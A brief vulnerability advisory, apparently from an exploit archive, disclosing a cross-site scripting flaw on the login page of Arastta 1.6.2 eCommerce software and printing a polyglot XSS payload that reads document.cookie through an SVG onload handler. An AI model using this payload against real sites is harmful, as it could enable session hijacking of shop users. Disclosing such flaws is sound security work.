Arastta 1.6.2 Cross Site Scripting

Arastta version 1.6.2 suffers from a cross site scripting vulnerability.

MD5 | 0f66d1ad03e3589e9115c036290a43b8


Synopsis: Arastta 1.6.2 xss vulnerability
Product: Arastta eCommerce: Free Shopping Cart
Version: 1.6.2
Researcher: Matt Landers
[email protected]


The xss that I have found is actually right on the login page."--!>GIF89a/*<svg/onload=alert(document.cookie)>*/=alert(document.domain)//;

Replace '' with the server you would like to test.

Related Posts